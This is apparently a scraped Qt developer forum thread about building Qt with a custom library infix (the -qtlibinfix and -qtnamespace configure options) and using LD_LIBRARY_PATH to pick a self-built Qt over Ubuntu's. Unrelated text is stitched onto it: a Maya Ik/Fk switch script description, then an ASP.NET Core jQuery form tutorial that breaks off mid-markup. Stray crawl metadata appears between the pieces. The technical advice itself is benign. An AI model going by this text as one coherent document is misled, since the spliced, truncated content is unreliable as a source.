Building the Qt Library - alex_yakimov Can I build Qt Library with my suffix like this: libQtCore.MYSUFFIX.so.4.8.0 libQtDBus.MYSUFFIX.so.4.8.0 ? I want to use my qt library (compiled by me) and do not use ubuntu qt library. Thank you in advance. - koahnig Moderators welcome to devnet For compilation of Qt you need to copy all the sources to a folder and compile them. When you follow the rules as defined through the information supplied with the source you will have a separate installation on your computer. You may have several versions/installations of Qt on your machine. Every installation comes with the tools like qmake, designer and stuff. These tools have the path names linked in. So, if you are using qmake of the version you compiled yourself, it will also access the libs and stuff you have compiled. Probably you can change the names of the libs afterwards. However, I strongly recommend to refrain from this step. Suddenly you need to take of a lot of things which are typically arranged by these tools. - tobias.hunger Moderators That is what the "-qtlibinfix" option to configure is for. You might also want to put Qt into a custom namespace using the "-qtnamespace" option to configure if you are afraid that something (library or plugin you end up using) might pull in the system Qt into your application. Note that you can also override the library search path to make sure your Qt version is picked up (check the LD_LIBRARY_PATH environment variable on linux, PATH on windows, DYLDsomething on mac, forgot the details;-). That is what use to switch between Qt versions all the time.
https://forum.qt.io/topic/15332/building-the-qt-library
CC-MAIN-2018-30
refinedweb
281
62.88
It works by duplicating the three joints and building the switch through the node system. The script can only work on a three joint chain that has the three joints parented to each other. If there is a joint inbetween any of the main joints (twist joints in arms) the script won't work. But if there are other joints parented to the main joints, but not inbetween the three selected joints, the script will still work. The script will also create the ikHandle on the Ik control joints. Directions: just copy the script into a shelf button, shift select the three joints you want the controller joints applied to from base to end and the controller you want the switch applied to last, and run the script. The script builds the control joints and the rigger should go back and rename the joints to whatever they what them to be. You will still need to set up the visibility of the contollers but the control joints are already setup. The order of the selection should be (Base joint, Mid joint, End joint, and Ik/Fk Controller). To set up the visiblility of the controllers just go into the node editor and show the Ik/Fk controller. There is a reverse node that is applied to the switch. The visibility of the Fk controllers go to the Ik/FkSwitch and Ik controllers connect to the reverse of the control switch. I made this script to make rigging for video games faster, though it can be used with any rig. Update: The Script how builds the Ik and Fk controles in the model. The only conrole it doesnt build is the Ik Elbow CTL. Using the script is exactly the same as before Set Up: The script now goes into your Maya Scripts Folder and you place the RunIkFkSwitchBuilder to run the main Script. The RunIkFkSwitch Builder script consists of: import IkFkSwitchBuilder IkFkSwitchBuilder.RunIkFkSwitchBuilder() Just paist these two lines into a python button in your shelf and it will run the builder. To adjust the controles to fit your model's better just move the Controle Vertexes. Please use the Feature Requests to give me ideas. Please use the Support Forum if you have any questions or problems. Please rate and review in the Review section.
https://ec2-34-231-130-161.compute-1.amazonaws.com/maya/script/ik-fk-switch-builder-for-maya
CC-MAIN-2022-27
refinedweb
385
79.4
Banishing errant tooltips Every now and then I have to run a program that doesn't manage its tooltips well. I mouse over some button to find out what it does, a tooltip pops up -- but then the tooltip won't go away. Even if I change desktops, the tooltip follows me and stays up on all desktops. Worse, it's set to stay on top of all other windows, so it blocks anything underneath it. The places where I see this happen most often are XEphem (probably as an artifact of the broken Motif libraries we're stuck with on Linux); Adobe's acroread (Acrobat Reader), though perhaps that's gotten better since I last used it; and Wine. I don't use Wine much, but lately I've had to use it for a medical imaging program that doesn't seem to have a Linux equivalent (viewing PETscan data). Every button has a tooltip, and once a tooltip pops up, it never goes aawy. Eventually I might have five of six of these little floating windows getting in the way of whatever I'm doing on other desktops, until I quit the wine program. So how does one get rid of errant tooltips littering your screen? Could I write an Xlib program that could nuke them? Finding window type First we need to know what's special about tooltip windows, so the program can identify them. First I ran my wine program and produced some sticky tooltips. Once they were up, I ran xwininfo and clicked on a tooltip. It gave me a bunch of information about the windows size and location, color depth, etc. ... but the useful part is this: Override Redirect State: yes In X, override-redirect windows are windows that are immune to being controlled by the window manager. That's why they don't go away when you change desktops, or move when you move the parent window. So what if I just find all override-redirect windows and unmap (hide) them? Or would that kill too many innocent victims? Python-Xlib I thought I'd have to write my little app in C, since it's doing low-level Xlib calls. But no -- there's a nice set of Python bindings, python-xlib. The documentation isn't great, but it was still pretty easy to whip something up. The first thing I needed was a window list: I wanted to make sure I could find all the override-redirect windows. Here's how to do that: from Xlib import display dpy = display.Display() screen = dpy.screen() root = screen.root tree = root.query_tree() for w in tree.children : print w w is a Window (documented here). I see in the documentation that I can get_attributes(). I'd also like to know which window is which -- calling get_wm_name() seems like a reasonable way to do that. Maybe if I print them, those will tell me how to find the override-redirect windows: for w in tree.children : print w.get_wm_name(), w.get_attributes() Window type, redux Examining the list, I could see that override_redirect was one of the attributes. But there were quite a lot of override-redirect windows. It turns out many apps, such as Firefox, use them for things like menus. Most of the time they're not visible. But you can look at w.get_attributes().map_state to see that. So that greatly reduced the number of windows I needed to examine: for w in tree.children : att = w.get_attributes() if att.map_state and att.override_redirect : print w.get_wm_name(), att I learned that tooltips from well-behaved programs like Firefox tended to set wm_name to the contents of the tooltip. Wine doesn't -- the wine tooltips had an empty string for wm_name. If I wanted to kill just the wine tooltips, that might be useful to know. But I also noticed something more important: the tooltip windows were also "transient for" their parent windows. Transient for means a temporary window popped up on behalf of a parent window; it's kept on top of its parent window, and goes away when the parent does. Now I had a reasonable set of attributes for the windows I wanted to unmap. I tried it: for w in tree.children : att = w.get_attributes() if att.map_state and att.override_redirect and w.get_wm_transient_for(): w.unmap() It worked! At least in my first test: I ran the wine program, made a tooltip pop up, then ran my killtips program ... and the tooltip disappeared. Multiple tooltips: flushing the display But then I tried it with several tooltips showing (yes, wine will pop up new tooltips without hiding the old ones first) and the result wasn't so good. My program only hid the first tooltip. If I ran it again, it would hide the second, and again for the third. How odd! I wondered if there might be a timing problem. Adding a time.sleep(1) after each w.unmap() fixed it, but sleeping surely wasn't the right solution. But X is asynchronous: things don't necessarily happen right away. To force (well, at least encourage) X to deal with any queued events it might have stacked up, you can call dpy.flush(). I tried adding that after each w.unmap(), and it worked. But it turned out I only need one dpy.flush()at the end of the program, just exiting. Apparently if I don't do that, only the first unmap ever gets executed by the X server, and the rest are discarded. Sounds like flush() is a good idea as the last line of any python-xlib program. killtips will hide tooltips from well-behaved programs too. If you have any tooltips showing in Firefox or any GTK programs, or any menus visible, killtips will unmap them. If I wanted to make sure the program only attacked the ones generated by wine, I could add an extra test on whether w.get_wm_name() == "". But in practice, it doesn't seem to be a problem. Well-behaved programs handle having their tooltips unmapped just fine: the next time you call up a menu or a tooltip, the program will re-map it. Not so in wine: once you dismiss one of those wine tooltips, it's gone forever, at least until you quit and restart the program. But that doesn't bother me much: once I've seen the tooltip for a button and found out what that button does, I'm probably not going to need to see it again for a while. So I'm happy with killtips, and I think it will solve the problem. Here's the full script: killtips. [ 11:36 Sep 27, 2011 More programming | permalink to this entry | comments ]
https://shallowsky.com/blog/programming/killing-tooltips.html
CC-MAIN-2020-34
refinedweb
1,128
83.86
Hi, I'm trying to program a 34972A using python to take thermocouple readings for a predetermined time and interval. In the benchlink data logger I am able to take the scans and store the data on a rolling basis. How could I replicate this using the commands available in command expert? This is what I have so far: import visa import time import pandas # start of Untitled rm = visa.ResourceManager() v34972A = rm.open_resource('USB0::0x0957::0x2007::MY49013602::0::INSTR') v34972A.timeout = None v34972A.write('*RST') v34972A.write(':ABORt') v34972A.write(':CONFigure:TEMPerature %s,%s,(%s)' % ('TCouple', 'K', '@102:104')) v34972A.write(':UNIT:TEMPerature %s' % ('C')) v34972A.write(':ROUTe:SCAN (%s)' % ('@102:104')) v34972A.write(':TRIGger:SOURce %s' % ('TIMer')) v34972A.write(':TRIGger:COUNt %d' % (5)) v34972A.write(':TRIGger:TIMer %G' % (1.0)) v34972A.write(':FORMat:READing:CHANnel %d' % (1)) v34972A.write(':FORMat:READing:ALARm %d' % (0)) v34972A.write(':FORMat:READing:UNIT %d' % (1)) v34972A.write(':FORMat:READing:TIME:TYPE %s' % ('ABSolute')) v34972A.write(':FORMat:READing:TIME %d' % (1)) v34972A.write(':FORMat:READing:UNIT %d' % (1)) readings = v34972A.query(':READ?') v34972A.close() rm.close() I am programming this in python. With the above I'm able to copy the readings after the scan finishes. Is there anyway to do copy and store the scans periodically instead? Hello. Did you ever get a satisfactory answer to this question? It's not clear to me what you mean. After 5 seconds, the READ? will transfer the data for 5 scan of the three channels in the scan list. If you are asking if multiple runs of this setup can be done and the data stored in the 34970A and then transferred at a later time, the answer is no. The memory is cleared after each run by either the READ? command or the INIT command.
https://community.keysight.com/thread/27047
CC-MAIN-2019-35
refinedweb
302
62.95
Agenda See also: IRC log <trackbot> Date: 01 March 2012 <cabanier> scribenick: cabanier <krit> <ed> dirk: the question: should SVG be on top of CSS animation or the other way around cameron: can you summarize? dirk: in the model you see the CSS change the intrinsic style? How do you apply SVG animation on top of that? cabanier: Brian, Shane and I have been having talks about how to progress animations <ed> says that the CSS animations overrides in gecko cabanier: we were thinking that maybe there should be the ability to specify the order that animations are applied cameron: you mean that the order lets you mix svg and css animation? cabanier: yes ... that's an idea we discussed cameron: with the sandwich model you look at document order dirk: yes. if the animations are applied on the same time, then document is chosen cameron: so is the proposal for both SVG and CSS cabanier: yes dirk: mozilla currently divides them ... the problem with specifiyng an order is that they run into different time container cabanier: yes, we're aware of that ... it's not a complete proposal at this point. ... just something we were thinking about this week ... we're hoping to have a proposal by the Hamburg F2F dirk: I believe that will be too late. ... do you have something in the mean time that works? cabanier: I think what you propose now is reasonable cameron: I think I'm OK with that as well. So you can specify behavior if you don't have the new keyword ... that way we're also not held up by the new css spec dirk: In the mean time, shoud the CSS animation mention SMIL cameron/cabanier: no cameron: are the notes of the animation meeting online? cabanier: yes, they are on the w3 server meeting notes: cabanier: overview: ed: do we have a resolution dirk: should we say that CSS animation don't mention SMIL? cabanier: yes ... and your proposed order is reasonable dirk: I believe it's OK to leave that unspecified at the moment cameron: so how do other browsers than firefox do this? dirk: we just landed a path to match WebKit with FireFox cameron: and opera? <heycam> ed, ed: I don't know. Is there a test? dirk: yes, Daniel Holbert supplied one ed: tested in Opera 12, seems that SMIL wins over the css transitions cameron: It seems that we're in a situation that the public versions are different cabanier: if everyone converging, shouldn't that become the standard? cameron/ed/Dirk: that would be OK for me cameron: to be sure: this is only when CSS and SMIL start at the same time ... is it ignoring the start times of the SVG or the CSS? ... if there are CSS and SVG, SVG will always come second and CSS first ... regardless of start time <scribe> ACTION: cabanier to come up with a solution to specify ordering of animations [recorded in] <trackbot> Created ACTION-3241 - Come up with a solution to specify ordering of animations [on Rik Cabanier - due 2012-03-08]. <ed> dirk: for SMIL animations, we need JavaScript ed: I agree. I have an action to commit some examples of converted SVG 1.1 animation tests using the js testing framework ... this is something we do internally cameron: we set the current animation time and look at the current values ... tav has an action on this ... is this easily doable or does it require a lot of work? tav: currently it is set up to test for environments that don't have javascript ... we like the test to have links so you can link to the spec (and vice versa) ... (going over the test suite) ... we have limited tests for CSS ... you have tests that require pixel perfect result ... for certain tests, we don't require that (ie gradients) cameron: last time we looked, the automation wasn't there dirk: you want to have it cross browser ... can you use the canvas tag/ plinss: some people have looked into that shepazu: hixie is looking into ways to draw svg paths directly into canvas ... you could draw the same SVG and canvas using the same API ... for a vast majority of content <krit> <heycam> This is with drawImage cameron: it works as long as you don't have external references cabanier: I believe it's the same in webkit dirk: I have to check that cameron: automation would be quite beneficial plinss: you could set it up so that you can say that a test must matchs all references or any ... so you can have browser specific reference files cameron: how are css animations tested? plinss: we don't have any ed: do you want to add more to the wiki page tav? ... for example, that the css testing framework documentation said you can't use plain SVG? tav: we can look at the script and see if you can use plain svg plinss: that should not be a problem ed: the metadata was supposed to be a HTML plinss: the harnass itself doesn't really care where the data comes from tav: can you extract the metadata from the SVG itself pllins: if it's XML, we open it and look HTML namespace head element inside of it plinsss: I parse the file and create the DOM and look for the head tag and expect the metadata to be there tav: right now it's all in the namespace "d" <ed> here's an example: plinss: if you use it consistently, it would be trivial to add to the build system tav: how would I find this? plinss: there is no good documentation on how to set it up <plinss> plinss: this is our wiki that has everything you need <plinss> <plinss> <plinss> ed: what would you recommend, going with the html:head structure, or keep and extend the existing svg test metadata? plinss: whatever is convenient ... it would be easiest if the metadata itself is the same <plinss> plinss: what you wrap it in is not relevant ... but it would be easiest if the data itself is similar cameron: we should be able to do it <plinss> plinss: it's like a bugzilla for your testsuite cameron: pretty cool plinss: it shows your revision history, who approved the tests, flags tests as needing work, etc ... it's still in development but you can use it now tav: where would the SVG test suite be located? plinss: you set up your own repository and shepherd will refer to it <heycam> there's an empty repo here: ed: we already have a svg2-tests repository <plinss> <RikCabanier> (discussion on using test repository) <plinss> <RikCabanier> ed: I propose that we move to this structure <RikCabanier> cameron: I agree <RikCabanier> ACTION: cameron to create directories in the SVG2 test repository [recorded in] <trackbot> Created ACTION-3242 - Create directories in the SVG2 test repository [on Cameron McCormack - due 2012-03-08]. <RikCabanier> plinss: within the approved directory, there's a data and src directory <RikCabanier> plinss: src has the test and data contains the spec section manifest files <RikCabanier> ACTION: tav to mirror css test metadata setup in SVG and come up with a template for new tests [recorded in] <trackbot> Created ACTION-3243 - Mirror css test metadata setup in SVG and come up with a template for new tests [on Tavmjong Bah - due 2012-03-08]. <krit> <krit> <RikCabanier> dirk: since the published draft is wrong, I need to ask everyone to approve a new working draft <RikCabanier> cyril: I don't see a difference <RikCabanier> dirk: look at chapter 7 <RikCabanier> cyril: o I see <RikCabanier> cameron: what is the current thinking on adding the SVG to the CSS spec? <RikCabanier> cameron: are people happy to include it in the spec? <RikCabanier> dirk: absolutely <RikCabanier> dirk: there are concerns that it slows down, but I'm committed to advancing it quickly <RikCabanier> dirk: we can go to CR in May <ed> <RikCabanier> ACTION: cameron to review section 7 in new CSS transform spec [recorded in] <trackbot> Created ACTION-3244 - Review section 7 in new CSS transform spec [on Cameron McCormack - due 2012-03-08]. <RikCabanier> shepazu: sorry, CR in May seems arbitrary <RikCabanier> dirk: the CSS working group will bring up issues in the meeting <RikCabanier> dirk: and if there are none, it will be accepted in may <RikCabanier> shepazu: when is last call supposed to be? <cyril> especially when it says "The merge is in progress and the specification is not yet ready for review." <RikCabanier> plinss: that is what we want too. If we drop prefixes early, we want to see proof that the implementations are identical <shepazu> scribenick: shepazu shepazu: I want to make sure that we aren't putting the cart before the horse… dropping vendor prefixes should be done after there are functional signs of stability and interoperability, like a full test suite and implementation report, not an arbitrary point of progress along the Rec track plinss: yes, that's also one of our criteria… but we do want to go to CR for the patent commitments shepazu: ok, I agree with that trackbot, end telcon This is scribe.perl Revision: 1.136 of Date: 2011/05/12 12:01:43 Check for newer version at Guessing input format: RRSAgent_Text_Format (score 1.00) Succeeded: s/we/Daniel Holbert/ Succeeded: s/I have to test it on an internal build/tested in Opera 12, seems that SMIL wins over the css transitions/ Succeeded: s/ I have an action to come up with an example/ I have an action to commit some examples of converted SVG 1.1 animation tests using the js testing framework/ Succeeded: s/svg directly/svg paths directly/ Succeeded: s/that you can't use plain SVG/that the css testing framework documentation said you can't use plain SVG/ Succeeded: s/recommend?/recommend, going with the html:head structure, or keep and extend the existing svg test metadata?/ Succeeded: s/repository /svg2-tests repository / Succeeded: s/shepherd/test repository/ Succeeded: s/manifest/spec section manifest/ Succeeded: s/topic/topic:/ Succeeded: s/keyword // Succeeded: s/CR in May is impossible/CR in May seems arbitrary/ Found ScribeNick: cabanier Found ScribeNick: shepazu Inferring Scribes: cabanier, shepazu Scribes: cabanier, shepazu ScribeNicks: cabanier, shepazu Default Present: plinss, cabanier, [IPcaller], heycam, krit, ed, [Microsoft], Tav, cyril, Doug_Schepers Present: plinss cabanier [IPcaller] heycam krit ed [Microsoft] Tav cyril Doug_Schepers Agenda: Found Date: 01 Mar 2012 Guessing minutes URL: People with action items: cabanier cameron tav WARNING: Input appears to use implicit continuation lines. You may need the "-implicitContinuations" option.[End of scribe.perl diagnostic output]
http://www.w3.org/2012/03/01-svg-minutes.html
CC-MAIN-2016-18
refinedweb
1,783
53.75
Q: What is ANTS? A: Software for Plan 9 from Bell Labs. It has a customized kernel and a package of programs and scripts to allow Plan 9 systems to do more with namespaces - create jail-like independent namespaces, create a "service namespace" that exists below the user namespace and administers it, jump between namespaces with a single command, and control the namespace of all machines on a grid with high-level semantics. Q: Is ANTS a work-in-progress research project or usable, practical software? A: It is usable, practical software for everyday use of Plan 9. It was created because I use a network of Plan 9 machines as my daily computing environment, and this software lets me do the things I want and solve the problems I have encountered. I use and rely on this software 24/7 to do my work and backup my data. In my use and testing it is robust and reliable. Q: Is ANTS tested on native Plan 9 hardware or just VMs? A: I have 3 native Plan 9 machines all running the 9pcram kernel and managed with the ANTS software. I also use qemu vms for backup and testing, but my primary environment is an always-on grid of native Plan 9 systems. Q: Is ANTS only for grids of machines? A: No, ANTS is useful on a single machine as well. In fact in some ways being able to create independent namespaces makes the biggest difference to one-machine setups. The dreaded "fshalt freeze" can be banished. Q: ANTS seems complicated. Isn't Plan 9 about making things simple? A: I believe ANTS is simple at its core, even if the description can be complicated when done in words. Everything ANTS does is about the core of Plan 9 - namespace operations, networking machines, using 9p ubiquitously. There is an inherent complexity to per process namespaces relative to a unified namespace for every process. Plan 9 design is based around the idea that the power and flexibility of per process namespace is worth the cost of complexity and potential user confusion. ANTS is an attempt to extend the core principles of Plan 9 even further into the architecture of the system, by deliberately creating separate and autonomous "namespace groups" that allow for independent environments. ANTS does not create new, competing mechanisms to do the things that namespaces do - it uses namespaces and extends their application in ways I believe are consistent with the design of Plan 9. Q: Is Plan 9 Port supported? A: I love p9p. The first thing I do when setting up a unix box is install plan9port. One of the systems on my local grid is a p9p box. That said, to paraphrase the 1984 VP debate: "I run servers with Plan 9. I know Plan 9. Plan 9 is a friend of mine. p9p - you're no Plan 9." As I am sure the authors and contributors to p9p would be the first to say, the absence of per process namespace as a standard in unix makes it impossible to really replicate the system, and ANTS is based on exactly the part of Plan 9 - per process namespace manipulation - that is absent entirely from p9p. That said, there are ways that ANTS helps integrate with unix systems. Hubfs can be used as a replacement for non Plan9, non 9p methods of connecting and controlling the system, and the plan9rc boot script enables Plan 9 systems to boot in new ways, including attaching more freely to resources provided by unix systems. Q: Is ANTS a security system? Can I use this to "jail" users on my systems securely? A: Not without customization. The design of ANTS can be understood by comparing it to jails, but it was not created for the purpose of isolating systems completely - instead, I use ANTS to create independent enviornments that can share resources freely. The sharing resources between environments is a large part of my use and purposes, and that is the opposite of what jails do. In addition, the architecture of ANTS is based on per process namespace, not on providing separate virtualized versions of kernel devices to clients. The bottom line is that while you could adapt the ANTS tools into a security and isolation framework, that is not their current purpose. By design, ANTS tries to make the namespaces independent, but very porous to information and able to share services at will. Q: Is ANTS complete, or will more features be added? A: ANTS is currently feature-complete and tested and intended for everyday use. It is still under "active development" so ideas for how to extend the tools further are welcome. My current intentions are to work on filesystems and fileservers, for example making some of the currently read-only fs programs able to write as well as read. It would be interesting to use a single tarfile as a root via a read/write tarfs. Other potential ideas include creating an analogous "gui layer muxer" for rio/draw to parallel hubfs for textual applications, and creating a GUI namespace exploration tool to understand how the namespace of an ANTS colony of machines is structured.
http://doc.9gridchan.org/antfarm/ANTSFAQ
CC-MAIN-2017-22
refinedweb
868
61.87
On Mon, 21 Aug 2000, Philipp Rumpf wrote:> > > If hierarchy leads to having to look more places, think about it more, and> > According to my proposal, we would end up having all network drivers in> drivers/*/net/*.But even that isn't enough, as shown by the tulip driver: basically eventhe regular PC drivers are available in so many different setups thatyou'd still want sub-hierarchies.(drivers/pc/ would end up being about 99% of the drivers, with the restbeing just smatterings here and there).> I would say drivers/s390/net and drivers/s390/misc are good directories.I would not disagree entirely. At the same time, there would be advantagesto arch/s390/drivers too. Especially if most people aren't that interestedin them - keep them out of the way.Keeping them out of the way is bad at times (ie those times when changesare made that affect everybody). But at other times it would be exactlywhat you want. Not polluting the namespace with stuff you don't want orneed is nice.What I'm saying is that it's not a case of "this is the right solution". I think drivers/input _is_ a good solution. I think it sucks as a solutionif it implies moving all the drivers that need it into the same place, butI think it's potentially the right answer if it's localized to the "coreinput handling routines" and people see it that way (kind of the same waydrivers/pci works - not all pci drivers are there, but it is a good way topartition the _generic_ issues about PCI somewhere which is neutral wrtwhat the driver actually ends up doing).But other issues, like how to move things around.. I'm not going to makethat choice as long as it's not the "obviously right one". As long as it'snot clear what the best choice is, the best bet is always "do as little aspossible, and nothing more". Linus-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgPlease read the FAQ at
https://lkml.org/lkml/2000/8/21/132
CC-MAIN-2016-36
refinedweb
352
70.43
In many cases you must manually edit the metadata to configure parts of a solution or composition. Metadata is created in XML format. You define aspects of a solution by changing the values of the elements and attributes of the XML files that belong to the solution. Oracle Studio provides a graphical interface where you can define the various aspects of a solution. This interface lets you make changes easily without having to manually edit the XML file. You can edit XML files for the following items in Oracle Studio: Machines Bindings. Daemons Users When you open an XML file, a graphical representation of the file is opened in the editor. The editor displays the elements and attributes in the file in the first column and their corresponding values in the second column. Each entry has an icon that indicates whether the entry is an element or an attribute. Click the Source tab to view the file in its native format. The following figure is an example of the editor's view of an XML file. Do the following to edit an XML file in Oracle Studio In the Design perspective, open the Navigator view. In the Navigator view, find the item with the XML file to edit. This can be a machine, binding, daemon, or user. Right-click the item and select Open as XML. A graphical list of the file's elements and attributes opens in the editor. Find the element or attribute (property) to change. Click in the right column next to the property you are changing and edit or add the value. Save the file, then select it again in the Project Explorer and press F5 to refresh. The XML file is updated automatically. You can also make the following changes to XML files in Oracle Studio: Add Elements and Attributes You can delete an element, attribute, or other object from the XML file. Do the following to remove an object Right-click an object from the list in the editor. Select Remove. You can add DTD information to an element or attribute. Do the following to add DTD Information Right-click an element or attribute and select Add DTD Information. The Add DTD Information dialog box opens. Enter the information requested in the dialog box. The following table describes the Add DTD Information dialog box. Save the file, then select it again in the Project Explorer and press F5 to refresh. The XML file is updated automatically. You can make changes to the namespaces associated with an element or attribute. Do the following to edit namespaces Right-click an element or attribute and select Edit namespaces. The Edit Schema Information dialog box opens. Click a button to make any changes to this information. Do the following to add a new namespace From the Schema Information dialog box, click Add. The Add Namespace Definitions dialog box opens. Select one of the following: Select from registered namespaces. This selection is available when the dialog box opens. Select from the list of registered namespaces and then click OK. If no registered namespaces are available, the list is empty. Specify new namespace. Enter the information described in the following table: To edit a namespace From the Schema Information dialog box, click Edit. Enter the information in the fields. You can add additional elements and attributes to the XML file. Do the following to add Elements and Attributes Right-click an element. Select one of the following: Add Attribute to add an attribute under the selected element. Add Child to add another element under the selected element Add Before to add another element above the selected element Add After to add another element below the selected element Provide a name for the element or attribute if required. You may also select the element from a submenu. The element or attribute is added to the file. Save the file, then select it again in the Project Explorer and press F5 to refresh. The XML file is updated automatically. You can replace an element with another legal element. Do the following to replace an element Right-click an element from the list in the editor. Select Replace with. Select an element from the submenu. Only legal elements are available. The original element is replaced with the selected element.
http://docs.oracle.com/cd/E14571_01/doc.1111/e16090/c_xml.htm
CC-MAIN-2014-15
refinedweb
716
58.69
Bummer! This is just a preview. You need to be signed in with a Basic account to view the entire video. Throwing Exceptions4:49 with Jeremy McLain Throw an exception to indicate that a method can't complete successfully. - 0:00 Let's get back to coding up the MapLocation class. - 0:03 We can make sure that users of this class don't accidentally make a map location - 0:07 that doesn't exist on the map. - 0:09 The natural place to do this validation is here in the constructor - 0:12 because the constructor is called when the object is created. - 0:16 So we can actually stop the object from being created - 0:18 by causing this method to fail. - 0:21 In order to do this validation, - 0:22 the constructor will need to have an instance of the map object. - 0:26 So we'll add it to the list of parameters here. - 0:29 Now we can check this map location is on the map by typing if map.OnMap and - 0:38 then pass it this, open and closing curly brace. - 0:44 Let me go over what we just did here. - 0:46 We're using the maps OnMap method to determine - 0:49 if the MapLocation being constructed is on the map. - 0:53 OnMap returns true if the Point is on the map. - 0:57 We only want to do something if the Point is not on the map. - 1:00 So we need to use the negation operator, so that it reads, if not OnMap. - 1:06 See how that works? - 1:08 The word this is a special keyword that refers to the current object. - 1:13 You can use this from any method to get the object that the method was called on. - 1:18 In the case of a constructor method, - 1:20 this refers to the object that's being constructed. - 1:23 You need to be careful when using this in a constructor though. - 1:26 You see an object is not fully constructed until the constructor has returned. - 1:31 There might still be some fields that haven't been fully initialized and - 1:35 using this too soon could have unexpected results. - 1:40 Just something to be aware of, the base constructor is always called first. - 1:45 So by now in the creation of the map object, - 1:48 all of the fields of the object have been initialized. - 1:50 So by the time the execution gets to here, - 1:53 it's safe to pass this to the OnMap method. - 1:57 Now we need to decide what to do if the point is not on the map? - 2:01 Exceptions are used to tell the calling code that a method was not - 2:05 able to complete successfully. - 2:07 In this case, the constructor is not able to complete successfully and - 2:11 the MapLocation object cannot be created. - 2:14 We've already learned how to catch exceptions, - 2:16 now we need to throw an exception. - 2:19 The most basic exception type provided by the .NET Framework - 2:22 is just named exception. - 2:25 It's in the system namespace. - 2:27 Exception types are classes just like any other class. - 2:30 To throw an exception we need to create a new exception instance and then throw it. - 2:35 I will show how to do that here. - 2:42 We instantiate exceptions the same way we instantiate every other class because - 2:47 exceptions are really just classes. - 2:49 The only thing new here is that we're using this throw keyword - 2:54 to throw the newly created exception object. - 2:57 Let's go see how this works in main. - 3:01 Let's delete the code we don't need here and - 3:03 attempt to create a MapLocation we know isn't on the map. - 3:16 Let's say 20, 20 which is way off our map. - 3:20 We also need to pass it the map object. - 3:22 Now we know this could potentially throw an exception. - 3:25 We need to make a decision. - 3:27 We can either try to handle the exception here, or we can let the exception be - 3:31 propagated back to the method that called the method we're in. - 3:35 In our case, - 3:36 we're in the main method which is the first method called in our program. - 3:40 So there's no other method that could handle the exception appropriately. - 3:43 It's best to handle it here. - 3:45 Otherwise, the program will crash and - 3:47 the user will see a scary looking error message. - 3:50 To handle the exception, - 3:52 we need to wrap the code that can throw the exception with the try catch. - 4:00 And the type of exception we need to catch is system.exception. - 4:05 We already have using system here at the top of the file. - 4:08 So we can just use the class name here. - 4:14 Here in the catch block, we'll print to the screen what happened. - 4:18 So we'll say console.rightline. - 4:24 That map location is not on the map. - 4:31 Now when we run this code we'll see our message printed to the screen. - 4:38 We can ignore the warning about the location variable not being used. - 4:42 Here's our error message. - 4:44 See how well that worked. - 4:45 There is more to learn about exceptions and how to use them in the next video.
https://teamtreehouse.com/library/throwing-exceptions-2
CC-MAIN-2019-43
refinedweb
968
82.54
On Thursday 17 January 2002 21:01, Ian Eure wrote: > On Thursday 17 January 2002 11:37 am, Eray Ozkural (exa) wrote: > > >. > >. I can only agree wholeheartedly. I think the discussion could be more productive if people admit that putting things in /opt indeed does not violate the FHS, but that one cannot really want to put things there nonetheless, and then try to solve the problems that we currently have (namespace being clutterd in /usr/share, kde2 and kde3 not being installable separately and the like) which _can_ be solved in /usr as well. cheers, Yven -- Yven Leist - leist@beldesign.de-
https://lists.debian.org/debian-devel/2002/01/msg01470.html
CC-MAIN-2014-10
refinedweb
102
63.73
xmlunittest 0.3.2 Library using lxml and unittest for unit testing XML. Anyone uses XML, for RSS, for configuration files, for… well, we all use XML for our own reasons (folk says one can not simply uses XML, but still…). So, your code generates XML, and everything is fine. As you follow best practices (if you don’t, I think you should), you have written some good unit-tests, where you compare code’s result with an expected result. I mean you compare string with string. Do you see the issue here? If you don’t, well, good for you. I see a lot of issue with this approach. XML is not a simple string, it is a structured document. One can not simply compare two XML string and expect all being fine: attributes’s order can change unexpectedly, elements can be optional, and no one can explain simply how spaces and tabs works in XML formatting. Here comes XML unittest TestCase: if you want to use the built-in unittest package (or if it is a requirement), and you are not afraid of using xpath expression with lxml, this library is made for you. You will be able to test your XML document, and use the power of xpath and various schema languages to write tests that matter. Links - Distribution: - Documentation: - Source: How to - Extends xmlunittest.XmlTestCase - Write your tests, using the function or method that generate XML document - Use xmlunittest.XmlTestCase‘s assertion methods to validate - Keep your test readable Example: from xmlunittest import XmlTestCase class CustomTestCase(XmlTestCase): def test_my_custom_test(self): # In a real case, data come from a call to your function/method. <leaf id="1" active="on" /> <leaf id="2" active="on" /> <leaf id="3" active="off" /> </root>""" # Everything starts with `assertXmlDocument` root = self.assertXmlDocument(data) # Check namespace self.assertXmlNamespace(root, 'ns', 'uri') # Check self.assertXpathsUniqueValue(root, ('./leaf@id', )) self.assertXpathValues(root, './leaf@active', ('on', 'off')) - Author: Florian Strzelecki - License: MIT - Categories - Development Status :: 4 - Beta - Intended Audience :: Developers - License :: OSI Approved :: MIT License - Programming Language :: Python :: 2.7 - Programming Language :: Python :: 3.4 - Topic :: Software Development :: Libraries :: Python Modules - Topic :: Software Development :: Testing - Topic :: Text Processing :: Markup :: XML - Package Index Owner: exirel - DOAP record: xmlunittest-0.3.2.xml
https://pypi.python.org/pypi/xmlunittest
CC-MAIN-2016-30
refinedweb
375
55.13
ASP.NET Core jQuery Bootstrap • Posted one month ago In this article let's look at how we can create a simple form and POST data to an AspNetCore API via jQuery. To style this application, we'll use Bootstrap, which is a popular CSS framework for desiging responsive web pages. We'll also make use of Tag Helpers, which make binding the back-end controller attributes - such as route urls in the views easy. For our example, let's make a ReaderStore portal where one can add a new Reader entry into the ReaderStore. We'll have a roaster of all submitted Readers along with their details in a grid. To add a reader to the ReaderStore, we shall create a ReaderRequestModel which pass submitted Reader data to the Controller. The ReaderRequestModel model also extends a few Response properties which are later used by the View for handling the result. namespace ReadersMvcApp.Models { public class ReaderResponseModel { public bool IsSuccess { get; set; } public string ReaderId { get; set; } } public class ReaderRequestModel : ReaderResponseModel { [Required] [StringLength(200)] public string Name { get; set; } [Required] [EmailAddress] [StringLength(250)] public string EmailAddress { get; set; } } } While the Name and EmailAddress fields are input attributes to the controller from the View, the result of the operation is decided by the IsSuccess and ReaderId attributes which are set once the Reader is added onto the ReaderStore. Next, we'll develop a form which accommodates these attributes along with their validation responses for any erroneous input. @model ReadersMvcApp.Models.ReaderRequestModel <div class="container-fluid"> <form asp- <div class="form-group"> <label asp-</label> <input asp- <span class="text-danger" asp-</span> </div> <div class="form-group"> <label asp-</label> <input asp- <span class="text-danger" asp-</span> </div> <button class="btn 